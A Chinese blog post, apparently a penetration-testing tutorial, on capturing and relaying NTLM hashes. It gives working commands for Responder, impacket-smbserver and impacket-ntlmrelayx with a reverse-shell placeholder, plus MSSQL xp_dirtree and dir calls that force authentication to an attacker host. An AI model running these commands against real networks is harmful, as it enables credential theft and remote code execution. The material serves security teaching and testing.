渗透测试--哈希窃取&哈希中继攻击

已于 2024-12-06 12:44:10 修改
阅读量410 收藏 5
点赞数 3
文章标签: 安全 web安全 网络安全 网络
于 2024-12-06 12:30:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44368093/article/details/144288047
版权

        在渗透测试中,我们一旦能够将用户的哈希定向到我们的smbserver我们就可以滥用它们。主要有以下两种利用方式:1.窃取NTLM 2.中继NTLM。了解上述两种方式,将打开我们的视野,但在此之前,我们必须知道我们在什么场景下,可以将用户的hash定向到我们的smbserver中。所以本文章将讲述如何搭建哈希窃取和哈希中继攻击的服务器以及一些普遍的可以将hash定向到我们服务器的场景。

哈希窃取

        使用responder工具,对内网进行监听,这通常需要一张可以开启混杂模式的网卡来完成。现在我们已经可以监听SMB服务了。我们将会窃取一切hash

responder -I <interface name>
sudo impacket-smbserver share ./ -smb2support

哈希中继攻击

        使用impacket-ntlmrelayx可以监听445端口,然后对获取的hash进行转发,并夹带私货。下面的指令搭建了一个服务器,该服务器监听445端口并将获取的hash传递给10.10.110.146,并执行smb携带的命令。

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 -c '<reverse shellcode>'

#-t是target的意思

#-c是执行何种命令

 场景

        知道如何搭建服务器了,我们就可以开始开拓想象力将hash传递给我们的服务器了。

1.responder窃取所有SMB广播

2.mssql,xp_dirtree,xp_fileexist,xp_subdir定向传递hash给中继服务器

3.系统dir命令传递hash

 responder窃取所有SMB广播

        responder在网络中的时候,会回应一切smb的请求,来诱导用户输入自己的账号密码,然后通过NTLM传递过来。之后我们就可以选择是窃取还是中继这个NTLM了,当然中继的话需要我们关闭responder的SMB服务,并搭建哈希中继服务器

cat /etc/responder/Responder.conf | grep 'SMB ='

SMB = Off


impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

mssql,xp_dirtree,xp_fileexist,xp_subdir定向传递hash给攻击服务器

        mssql的命令可以发起smb请求,将这个请求发送给攻击服务器,我们就可以完成中继或者窃取了。

xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

 系统dir系统传递hash给攻击服务器

        系统命令dir可以直接完成smb请求,就是这么简单。

dir \\10.10.11.1\share

瘾大侠
关注
智能电源管理技术--原理简介
撒哈拉的绿洲
02-28 6030
一、专业术语          1. LDO(Low Dropout Regulator)              低压差线性稳压器              优点:稳定性好,负载响应快,输出纹波小               缺点:效率低,输入输出的电压差不能太大          2. DC-DC(Direct Current to Direct Current)
Charger IC原理讲解与个人理解
KEEPergoing的博客
10-16 4407
这是在现在的笔记本中的PD(快充)、DP(显示协议)的方案,只看PD。当插入一个适配器时,通过Type-C的CC1、CC2进行握手,有的PD芯片具有识别控制IO引脚,可以通过这个做逻辑,再让电力通过进入Charger芯片。安森美的PD芯片示意图中展示是电力通过OVP(Over Voltage Protection,过压保护)直接进入到Charger芯片中去。它的主要功能是控制电池的充电过程,以确保安全、有效地为电池充电,同时延长电池的使用寿命。
手机快充芯片及其技术标准和设计原理详解
weixin_43519391的博客
01-12 1万+
手机快充芯片及其技术标准和设计原理详解 智能手机对于宽带无线通信、图像处理等多方面的需求导致实际耗电呈指数增长。未来5G通信带宽将比4G增加10倍,4K/8K等高清视频技术逐渐应用,CPU、GPU等运算电路处理能力不断增强,这一切都将导致智能手机整体能耗需求将成指数增长。 电池容量呈线性缓慢增长,能耗需求缺口逐渐拉大。电池技术迟迟无法突破,成为终端使用的最大瓶颈。电池容量增长缓慢,每年线性提升约15%,而能耗则是呈指数增长,能耗需求与电池性能的差距愈发明显。电池性能曲线将与能耗需求曲线严重脱..
NTC(电池温度检测)
chylovecsd的博客
05-25 8271
https://blog.csdn.net/mcgrady_tracy/article/details/52818100 NTC 那是當作電池的溫度偵測用, 通常 NTC 是要包裝在電池內部。但是有些電池沒有 NTC,所以就需要外掛 NTC 放置於電池附近去偵測電池溫度。 如果直接使用外部電源而且沒有充電功能,基本上 NTC 是可以拿掉。(但是軟件人員要會改 MTK 的程序代碼,否則會開不機或是其他問題出現) 手机里面电池通常有4个引脚,即电池的+、-极,ID引脚、NTC引脚。 ID引脚用来识
MTK手机平台充电原理
热门推荐
汽车以太网和SOA
11-13 1万+
MTK手机平台充电原理
Moody-charger.rar_charger_充电_原理图 产品_电瓶车_量产
07-15
综上所述,"Moody-charger.rar"中的充电器设计不仅涉及到电气工程的基础理论,如电力电子、控制理论,还涉及到实际工程中的诸多考量,如可靠性、安全性、成本优化等。通过深入研究这款产品的原理图,我们可以更深入...
基于C语言核心功能的便携式锂聚合物充电器cheali-charger设计源码
09-29
C语言作为该项目的核心开发语言,以其高效的运行性能和良好的硬件控制能力,为Cheali-Charger提供了坚实的技术基础。C语言在嵌入式系统开发中占据着举足轻重的地位,特别是在需要直接与硬件进行交互的应用中。在...
chongdianqi.rar_charger_充电器_充电程序
09-23
对于开发者来说,这是一份宝贵的资源,可以学习和理解充电器软件设计的细节,也可以作为自定义或改进充电器功能的基础。 总的来说,这个压缩包涉及的知识点涵盖了充电器的硬件控制、保护机制以及人机交互,这些都是...
80-P8536-1-A-QUALCOMM-CHARGER-DETECT-ISSUES-DEBUG
10-09
【80-P8536-1-A-QUALCOMM-CHARGER-DETECT-ISSUES-DEBUG】指南是高通(Qualcomm)公司为解决其电源管理集成电路(PMIC)在充电检测过程中遇到的问题而提供的内部调试文档。该文档详细阐述了如何处理与高通充电器检测...
RTC_2SEC_REBOOT_ENABLE
TopicDev的专栏
10-22 2273
拔掉电池,然后快速插上。 这时候手机会自动开机。 设置 RTC_2SEC_REBOOT_ENABLE 为 0
MTK的充电方案—PMIC充电
u010783226的专栏
02-02 8571
MTK的充电方案—PMIC充电  MTK目前有三套充电方案,主要如下: (1)线性充电——linering charge(PMIC充电)      充9停1,充电电流不能太大,目前最大能做到1.2A; (2)switch charge(charger IC充电)      有单独的充电IC控制,无充9停1,充电电流可以大。 (3)MTK pump exp
mt6737电池状态监测
Android开发
05-30 3572
   这里分析下mt6735平台下的电池驱动,使用的bq24296芯片(开关模式的充电方式)。kernel-3.18/drivers/power/mediatek/battery_common.cstatic int battery_probe(struct platform_device *dev) { struct class_device *class_dev = NULL; int r...
升降压电路Charger&Boost 自己的小解读
Zoie_的博客
06-15 1976
上图为charger内部大致的结构图,Vbus进来,Q1可先认为是二极管,当Q2开启时,可以向后级电感储能;当Q2关断时,Q3、SW、电池形成一个回路(因为同样接地),电感给电池充电。 锂电池标称值为3.7V,满电电压是4.2V,VBUS电压是5V,从VBUS向电池充电相当于降压过程,从电池向VBUS方向则相当于升压过程。 当开关闭合时,A点的电压为0,Vi直接给电感L充电,充电电流路径见下图,开关导通时间dt=占空比开关周期=DT。 当开关断开时,L中存储的能量会通过二极管,给负载放电;同时,Vi也会
手机charger芯片的选型方案及外围电路搭建
qq_43298471的博客
07-31 4957
保护元件的大小和类型需要根据充电器的工作条件和故障模式来选择,一般来说,保护元件越多,安全性越高,但是成本也越高;输出滤波元件的大小和类型需要根据充电器的拓扑结构和参数来选择,一般来说,电感越大,纹波越小,但是效率也越低;输入滤波电容的大小和类型需要根据输入源的特性和充电器的要求来选择,一般来说,电容越大,滤波效果越好,但是成本也越高。开关升压charger芯片是一种特殊的方案,它使用开关管和电感来实现输入电压到电池电压的升压转换,效率较低,但可以支持低输入电压的充电源,例如太阳能板或热电发生器。
全智平台电源管理芯片-AXP813
天高任鸟飞海阔凭鱼跃的专栏
07-06 5693
1、 Overview AXP813是一个高集成的电源管理芯片和音频编解码芯片,大小11mm*11mm。芯片包含了电源管理、音频编解码、兼容USB3.0的flash charger、实时时钟RTC、模数转换ADC以及硬件DSP。 AXP813提供了21路的电源输出以及多通道的12位ADC转换通道用于检测电压、电流和温度等,并集成了OVP、UVP、OTP和OCP等保护电路来确保供电系统的稳定性和...
MTK添加充电(快充)
2201_75918415的博客
08-01 2742
很多时候需要把不用的宏开关给关掉,要不在某些驱动里面会识别运行,可能会让器件运行不起来(我就遇到过一次调试的时候因为添加打印log,打印出来的信息编码对不上,是乱码,造成系统一直开机重启,把log信息去掉就好了)MTK_DUAL_CHARGER_SUPPORT = no //外部充电ic的时候启用比如sd7601,rt9465。1.在添加充电之前,看准原理图弄清楚,你的充电是通过gpio供电,还是走pmic的。MIVR = “設定的允許的充電器最低電壓”VBUS = “测量到充电器的电压”
Android 8.1 默认开机日期
多学一点点
12-05 1547
现在android 8.1的软件 默认开机日期是2010年1月1日,客户说要改成2018年1月1 日,如何修改? 直接上代码 ,亲测有效 路径:alps\\vendor\mediatek\proprietary\bootable\bootloader\preloader\custom\工程名称\inc\cust_rtc.h #ifndef __CUST_RTC_H__ #define __...
mtk上电开机记录
最新发布
qq_49102600的博客
01-02 341
e.vendor/mediatek/proprietary/bootable/bootloader/preloader/platform/mt6765/src/drivers/mt6370.c(有mt6370就需要修改)
10、充电电流的调用流程
weixin_36044869的博客
03-04 3418
从 mtk_cooler_bcct_v1.c文件开始分析,这个里面的东西和温度有关 chrlmt_set_limit_handler 函数 static void chrlmt_set_limit_handler(struct work_struct *work) { if (bat_info_charging_type == 3) { mtk_cooler_bcct_dprintk_al...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值